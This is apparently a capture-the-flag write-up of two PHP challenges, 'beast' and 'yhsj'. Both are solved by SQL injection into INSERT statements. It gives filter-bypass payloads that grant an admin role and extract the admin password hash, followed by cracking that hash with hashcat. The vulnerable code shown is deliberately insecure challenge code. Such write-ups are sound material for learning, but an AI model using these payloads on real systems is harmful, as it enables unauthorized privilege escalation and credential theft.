beast: INSERT query injection

Here you could register and you would get guest status, admin was needed for flag.

here is important snippet of registration code:

if(strlen($_POST[phone])>=20) exit("Access Denied");
if(eregi("admin",$_POST[id])) exit("Access Denied");
if(eregi("load|admin|0x|#|hex|char|ascii|ord|from|select|union|infor|challenge",$_POST[phone])) exit("Access Denied");

@mysql_query("insert into challenge4 values('$_POST[id]',$_POST[phone],'guest')");

so, id was filtered and phone had to be less than 20 chars. Took me quite long to get this one, but solution is simple:

id=nimda
**phone=1,reverse(id))--%0a**

making the query:

insert into challenge4 values('nimda',1,reverse(id))-- ,'guest)

Now login as “nimda” with phone “1” and you got the flag ^^ pretty nice one!

yhsj: insert query injection

if(eregi("update|set|union|#|char|ascii|hex|infor|mysql|\.|load",$_POST[tm])) exit("<center><font color=brown>Access Denied</font></center>");
@mysql_query("insert into talk_msg values(1,'$_SESSION[id]','$ck[id]','$_POST[msg]',$_POST[tm])");

$_POST[tm] was entry point - submit something like

**1),(1,0x706c6974,0x706c6974,(select pw from talk where id=0x61646d696e),1**

making the query

insert into talk_msg values(1,'plit','plit','blablabla',1),(1,0x706c6974,0x706c6974,(select pw from talk where id=0x61646d696e),1)

Now, admin’s hash is in your message. It was salted like md5(‘zombie_$pw’) so I used hashcat+dictionaries to crack it, getting zombie_hellsonic Login as admin:zombie_hellsonic and get the flag.